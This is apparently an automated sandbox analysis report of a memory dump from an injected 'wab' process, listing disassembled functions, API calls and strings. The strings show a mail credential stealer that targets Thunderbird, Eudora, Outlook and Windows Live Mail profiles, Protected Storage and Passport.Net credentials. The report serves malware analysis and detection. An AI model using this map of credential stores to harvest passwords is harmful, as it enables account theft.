                                                                                    • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                  • memset.MSVCRT ref: 00402086
                                                                                  • memset.MSVCRT ref: 0040209B
                                                                                  • strlen.MSVCRT ref: 004020A1
                                                                                  • strlen.MSVCRT ref: 004020AF
                                                                                  • strlen.MSVCRT ref: 004020E2
                                                                                  • strlen.MSVCRT ref: 004020F0
                                                                                  • memset.MSVCRT ref: 00402018
                                                                                    • Part of subcall function 004070E3: _mbscpy.MSVCRT ref: 004070EB
                                                                                    • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                  • _mbscpy.MSVCRT ref: 00402177
                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00402181
                                                                                  • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104), ref: 0040219C
                                                                                    • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: strlen$memset$Close_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
                                                                                  • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                                                                                  • API String ID: 1846531875-4223776976
                                                                                  • Opcode ID: 24cd1edf3e0e6a0f2a794eae778d20d0b8fcf68951756f89e235529ef22c09db
                                                                                  • Instruction ID: 9c65708a615aa9161e76439fb3ec4404e3c7586a7422c94cf2faf2b42662f59f
                                                                                  • Opcode Fuzzy Hash: 24cd1edf3e0e6a0f2a794eae778d20d0b8fcf68951756f89e235529ef22c09db
                                                                                  • Instruction Fuzzy Hash: 2291193290515D6AEB21D6618C86FDE77AC9F58304F1400FBF508F2182EB78EB858B6D
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                    • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                                                                                    • Part of subcall function 00404A99: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                                                    • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                                                                                    • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040D190
                                                                                  • DeleteObject.GDI32(?), ref: 0040D1A6
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                                                                  • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
                                                                                  • API String ID: 745651260-375988210
                                                                                  • Opcode ID: bd8dfaf8f5238b4af1542c29128bf357c1e928978a50a5a806f3f0ecb947c582
                                                                                  • Instruction ID: dea5423bbc6b84474d5379bd8edfb36e55d4f41410ab6b686afcfd17116e90de
                                                                                  • Opcode Fuzzy Hash: bd8dfaf8f5238b4af1542c29128bf357c1e928978a50a5a806f3f0ecb947c582
                                                                                  • Instruction Fuzzy Hash: 0A61AF71908345EBD7609FA1EC89A9FB7E8FF85704F00093FF544A21A1DB789805CB5A
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                    • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                                                                  • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C35
                                                                                  • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A
                                                                                  • _mbscpy.MSVCRT ref: 00403E54
                                                                                  Strings
                                                                                  • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
                                                                                  • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
                                                                                  • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
                                                                                  • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
                                                                                  • PStoreCreateInstance, xrefs: 00403C44
                                                                                  • pstorec.dll, xrefs: 00403C30
                                                                                  • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
                                                                                  • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
                                                                                  • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
                                                                                  • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
                                                                                  • www.google.com/Please log in to your Gmail account, xrefs: 00403C86
                                                                                  • www.google.com/Please log in to your Google Account, xrefs: 00403C9A
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: Library$AddressFreeLoadProc_mbscpy
                                                                                  • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                                                                  • API String ID: 1197458902-317895162
                                                                                  • Opcode ID: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
                                                                                  • Instruction ID: f12475a9e901df39a06d2b9041e3ab5decda6d4897279b708da5bb949cd86342
                                                                                  • Opcode Fuzzy Hash: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
                                                                                  • Instruction Fuzzy Hash: 7C51C971600201B6E714EF71CD86FDAB66CAF01709F14013FF915B61C2DBBDA658C699
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 231 444c4a-444c66 call 444e38 GetModuleHandleA 234 444c87-444c8a 231->234 235 444c68-444c73 231->235 236 444cb3-444d00 __set_app_type __p__fmode __p__commode call 444e34 234->236 235->234 237 444c75-444c7e 235->237 246 444d02-444d0d __setusermatherr 236->246 247 444d0e-444d68 call 444e22 _initterm __getmainargs _initterm 236->247 239 444c80-444c85 237->239 240 444c9f-444ca3 237->240 239->234 243 444c8c-444c93 239->243 240->234 241 444ca5-444ca7 240->241 245 444cad-444cb0 241->245 243->234 244 444c95-444c9d 243->244 244->245 245->236 246->247 250 444da4-444da7 247->250 251 444d6a-444d72 247->251 252 444d81-444d85 250->252 253 444da9-444dad 250->253 254 444d74-444d76 251->254 255 444d78-444d7b 251->255 256 444d87-444d89 252->256 257 444d8b-444d9c GetStartupInfoA 252->257 253->250 254->251 254->255 255->252 258 444d7d-444d7e 255->258 256->257 256->258 259 444d9e-444da2 257->259 260 444daf-444db1 257->260 258->252 261 444db2-444dc6 GetModuleHandleA call 40cf44 259->261 260->261 264 444dcf-444e0f _cexit call 444e71 261->264 265 444dc8-444dc9 exit 261->265 265->264
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                                  • String ID: k{v
                                                                                  • API String ID: 3662548030-443568515
                                                                                  • Opcode ID: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                                                                                  • Instruction ID: dd0826a03bb44e9375613df7343647c7563f031d366e42a412bc6d4d3743f318
                                                                                  • Opcode Fuzzy Hash: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                                                                                  • Instruction Fuzzy Hash: AF41A0B0C02344DFEB619FA4D8847AD7BB8FB49325F28413BE451A7291D7388982CB5D
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 269 40fb00-40fb35 call 44b090 RegOpenKeyExA 272 40fc37-40fc3d 269->272 273 40fb3b-40fb4f RegOpenKeyExA 269->273 274 40fb55-40fb7e RegQueryValueExA 273->274 275 40fc2d-40fc31 RegCloseKey 273->275 276 40fc23-40fc27 RegCloseKey 274->276 277 40fb84-40fb93 call 404734 274->277 275->272 276->275 277->276 280 40fb99-40fbd1 call 4047a5 277->280 280->276 283 40fbd3-40fbdb 280->283 284 40fc19-40fc1d LocalFree 283->284 285 40fbdd-40fc14 memcpy * 2 call 40f802 283->285 284->276 285->284
                                                                                  APIs
                                                                                  • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB31
                                                                                  • RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB4B
                                                                                  • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E7F,?), ref: 0040FB76
                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E7F,?), ref: 0040FC27
                                                                                    • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                    • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                  • memcpy.MSVCRT ref: 0040FBE4
                                                                                  • memcpy.MSVCRT ref: 0040FBF9
                                                                                    • Part of subcall function 0040F802: RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,00456E58,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                                                                                    • Part of subcall function 0040F802: memset.MSVCRT ref: 0040F84A
                                                                                    • Part of subcall function 0040F802: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                                                    • Part of subcall function 0040F802: RegCloseKey.ADVAPI32(?), ref: 0040F95F
                                                                                  • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FC1D
                                                                                  • RegCloseKey.KERNELBASE(?,?,?,?,?,00403E7F,?), ref: 0040FC31
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                                                                                  • String ID: Dynamic Salt$Software\Microsoft\IdentityCRL$Value$XnE
                                                                                  • API String ID: 2768085393-2409096184
                                                                                  • Opcode ID: 450d76980a5b045f2fe885eff3fb720ced70e3f8b230ed55941267a192e7c898
                                                                                  • Instruction ID: dc42a4d3869b5799c80e2b369f36587618a74ee4c7744a3ab9dbe2425e101413
                                                                                  • Opcode Fuzzy Hash: 450d76980a5b045f2fe885eff3fb720ced70e3f8b230ed55941267a192e7c898
                                                                                  • Instruction Fuzzy Hash: BA316F72508348AFE750DF51DC81E5BBBECFB88358F04093EBA94E2151D735D9188B6A
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 0044430B
                                                                                    • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
                                                                                    • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
                                                                                    • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
                                                                                    • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
                                                                                    • Part of subcall function 00410DBB: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                                                    • Part of subcall function 00410DBB: _mbscpy.MSVCRT ref: 00410E87
                                                                                  • memset.MSVCRT ref: 00444379
                                                                                  • memset.MSVCRT ref: 00444394
                                                                                    • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                  • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
                                                                                  • strlen.MSVCRT ref: 004443DB
                                                                                  • _strcmpi.MSVCRT ref: 00444401
                                                                                  Strings
                                                                                  • \Microsoft\Windows Mail, xrefs: 00444329
                                                                                  • \Microsoft\Windows Live Mail, xrefs: 00444350
                                                                                  • Store Root, xrefs: 004443A5
                                                                                  • Software\Microsoft\Windows Live Mail, xrefs: 004443AA
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: memset$strlen$Close$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
                                                                                  • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                                                                  • API String ID: 832325562-2578778931
                                                                                  • Opcode ID: 88eecb5596c8840dacdab9e6d9cddf85e53b3344e0b54babe6c18053d28390f2
                                                                                  • Instruction ID: c969096c6c8075cae9da81fbffcb27ba025b1fc1210c9b39c3855a2ab2b3ab2e
                                                                                  • Opcode Fuzzy Hash: 88eecb5596c8840dacdab9e6d9cddf85e53b3344e0b54babe6c18053d28390f2
                                                                                  • Instruction Fuzzy Hash: A73197725083446BE320EA99DC47FCBB7DC9B85315F14441FF64897182D678E548877A
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 308 40f460-40f5bd memset * 2 call 4078ba * 2 RegOpenKeyExA 313 40f5c3-40f5ea RegQueryValueExA 308->313 314 40f6d9-40f6df 308->314 315 40f6d0-40f6d3 RegCloseKey 313->315 316 40f5f0-40f5f4 313->316 315->314 316->315 317 40f5fa-40f604 316->317 318 40f606-40f618 call 40466b call 404734 317->318 319 40f677 317->319 329 40f66a-40f675 call 404785 318->329 330 40f61a-40f63e call 4047a5 318->330 321 40f67a-40f67d 319->321 321->315 322 40f67f-40f6bf call 4012ee RegQueryValueExA 321->322 322->315 328 40f6c1-40f6cf 322->328 328->315 329->321 330->329 335 40f640-40f643 330->335 336 40f661-40f664 LocalFree 335->336 337 40f645-40f65a memcpy 335->337 336->329 337->336
                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 0040F567
                                                                                  • memset.MSVCRT ref: 0040F57F
                                                                                    • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
                                                                                  • RegOpenKeyExA.KERNELBASE(80000001,00000082,00000000,00020019,?,?,?,?,?,00000000), ref: 0040F5B5
                                                                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
                                                                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
                                                                                    • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                                                    • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                    • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                  • memcpy.MSVCRT ref: 0040F652
                                                                                  • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000), ref: 0040F6D3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: QueryValuememset$AddressCloseFreeLibraryLoadLocalOpenProc_mbscpy_mbsnbcatmemcpy
                                                                                  • String ID:
                                                                                  • API String ID: 2012582556-3916222277
                                                                                  • Opcode ID: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                                                                                  • Instruction ID: 8a535e2a1d92942c08e22e27bc62a3a9d9c5418ddd7b2e408e782496f1cf9495
                                                                                  • Opcode Fuzzy Hash: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                                                                                  • Instruction Fuzzy Hash: 9E81FC218047CEDEDB31DBBC8C485DDBF745B17224F0843A9E5B47A2E2D3245646C7AA
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 338 4037ca-40381c memset * 2 call 444551 341 4038e2-4038e5 338->341 342 403822-403882 call 4021b6 call 406f06 * 2 strchr 338->342 349 403884-403895 _mbscpy 342->349 350 403897-4038a2 strlen 342->350 351 4038bf-4038dd _mbscpy call 4023e5 349->351 350->351 352 4038a4-4038bc sprintf 350->352 351->341 352->351
                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 004037EB
                                                                                  • memset.MSVCRT ref: 004037FF
                                                                                    • Part of subcall function 00444551: memset.MSVCRT ref: 00444573
                                                                                    • Part of subcall function 00444551: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                                                                    • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                    • Part of subcall function 00406F06: memcpy.MSVCRT ref: 00406F20
                                                                                  • strchr.MSVCRT ref: 0040386E
                                                                                  • _mbscpy.MSVCRT ref: 0040388B
                                                                                  • strlen.MSVCRT ref: 00403897
                                                                                  • sprintf.MSVCRT ref: 004038B7
                                                                                  • _mbscpy.MSVCRT ref: 004038CD
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: memset$_mbscpystrlen$Closememcpysprintfstrchr
                                                                                  • String ID: %s@yahoo.com
                                                                                  • API String ID: 317221925-3288273942
                                                                                  • Opcode ID: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                                                                                  • Instruction ID: 76d3f49adc6711096ede71316d8c54080aa8a6e72e6628a7d10ff16d2d587f45
                                                                                  • Opcode Fuzzy Hash: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                                                                                  • Instruction Fuzzy Hash: 4B2154B3D001285EEB11EA54DD42FDA77ACDF85308F0404EBB649F7041E678AF888A59
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 354 404a99-404ac2 LoadLibraryA 355 404ac4-404ad2 GetProcAddress 354->355 356 404aec-404af4 354->356 357 404ad4-404ad8 355->357 358 404add-404ae6 FreeLibrary 355->358 361 404af5-404afa 356->361 362 404adb 357->362 358->356 360 404ae8-404aea 358->360 360->361 363 404b13-404b17 361->363 364 404afc-404b12 MessageBoxA 361->364 362->358
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                                                                                  • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                                                                                  • MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: Library$AddressFreeLoadMessageProc
                                                                                  • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                  • API String ID: 2780580303-317687271
                                                                                  • Opcode ID: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                                                                                  • Instruction ID: 488ab604db7d7bb3946a6a0ddadc23e58717ff74c8dc9d9f2a6c2f93e1cc5ebb
                                                                                  • Opcode Fuzzy Hash: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                                                                                  • Instruction Fuzzy Hash: F401D679B512106BE7115BE59C89F6BBAACDB86759B040135BA02F1180DAB899018A5C
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 365 4034e4-403544 memset * 2 call 410b1e 368 403580-403582 365->368 369 403546-40357f _mbscpy call 406d55 _mbscat call 4033f0 365->369 369->368
                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 00403504
                                                                                  • memset.MSVCRT ref: 0040351A
                                                                                    • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                  • _mbscpy.MSVCRT ref: 00403555
                                                                                    • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                    • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                  • _mbscat.MSVCRT ref: 0040356D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: _mbscatmemset$Close_mbscpystrlen
                                                                                  • String ID: InstallPath$Software\Group Mail$fb.dat
                                                                                  • API String ID: 3071782539-966475738
                                                                                  • Opcode ID: ba1e5b879fdebbe75c382cc963f8f285cb869b8741e9311d789e5899e64a9370
                                                                                  • Instruction ID: a2fd564f6d67a76fe1541fb13c78ccc0c8ee6374decffd3371ae058987aad369
                                                                                  • Opcode Fuzzy Hash: ba1e5b879fdebbe75c382cc963f8f285cb869b8741e9311d789e5899e64a9370
                                                                                  • Instruction Fuzzy Hash: C201FC7694416875E750F6659C47FCAB66CCB64705F0400A7BA48F30C2DAF8BBC486A9
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 374 40f6e2-40f70a call 40466b call 4045db 379 40f710-40f717 call 404734 374->379 380 40f7e9-40f801 call 404656 call 404785 374->380 379->380 385 40f71d-40f72e CredReadA 379->385 385->380 387 40f734-40f73a 385->387 389 40f740-40f743 387->389 390 40f7e5 387->390 389->390 391 40f749-40f759 389->391 390->380 392 40f75a-40f770 391->392 392->392 393 40f772-40f795 call 4047a5 392->393 396 40f7e2 393->396 397 40f797-40f7b6 WideCharToMultiByte 393->397 396->390 398 40f7b8-40f7c6 strlen 397->398 399 40f7d9-40f7dc LocalFree 397->399 398->399 400 40f7c8-40f7d8 _mbscpy 398->400 399->396 400->399
                                                                                  APIs
                                                                                    • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                                                    • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                    • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                    • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                    • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                    • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                    • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                    • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                    • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                  • CredReadA.ADVAPI32(Passport.Net\*,00000004,00000000,?,?,00000000), ref: 0040F729
                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000100,000000FF,00000000,00000000,?,?,?,?,00000000), ref: 0040F7AE
                                                                                  • strlen.MSVCRT ref: 0040F7BE
                                                                                  • _mbscpy.MSVCRT ref: 0040F7CF
                                                                                  • LocalFree.KERNEL32(00000000,?,00000000), ref: 0040F7DC
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$LibraryLoad_mbscpy$ByteCharCredFreeLocalMultiReadWidestrlen
                                                                                  • String ID: Passport.Net\*
                                                                                  • API String ID: 4000595657-3671122194
                                                                                  • Opcode ID: 0af64cc57546a9fbf77b674907fee208d195fdaa1b5113e78288b1972eb9facf
                                                                                  • Instruction ID: cbd5109d0b46f6ae46d16b49076c688dceaf9cc559dd015bf255ce3d8649dee3
                                                                                  • Opcode Fuzzy Hash: 0af64cc57546a9fbf77b674907fee208d195fdaa1b5113e78288b1972eb9facf
                                                                                  • Instruction Fuzzy Hash: 98316F76900109ABDB10EFA6DD45DAEB7B9EF89300F10007BE605F7291DB389A04CB59
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 401 40ccd7-40cd06 ??2@YAPAXI@Z 402 40cd08-40cd0d 401->402 403 40cd0f 401->403 404 40cd11-40cd24 ??2@YAPAXI@Z 402->404 403->404 405 40cd26-40cd2d call 404025 404->405 406 40cd2f 404->406 408 40cd31-40cd57 405->408 406->408 410 40cd66-40cdd9 call 407088 call 4019b5 memset LoadIconA call 4019b5 _mbscpy 408->410 411 40cd59-40cd60 DeleteObject 408->411 411->410
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                                                                                  • String ID:
                                                                                  • API String ID: 2054149589-0
                                                                                  • Opcode ID: ac2346bdc6bf8c69db932d73876581c2cd712649df4ebdee0f030b2719307f74
                                                                                  • Instruction ID: e49e2262ea613e2b532621416bf92f05b9d60d1a181aada648b692035ce2a44d
                                                                                  • Opcode Fuzzy Hash: ac2346bdc6bf8c69db932d73876581c2cd712649df4ebdee0f030b2719307f74
                                                                                  • Instruction Fuzzy Hash: C921A1B0900360DBDB10DF749DC97897BA8EB40B04F1405BBED08FF286D7B895408BA8
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                    • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                                                                                    • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                                                                                    • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                                                                                    • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                                                                                    • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                                    • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
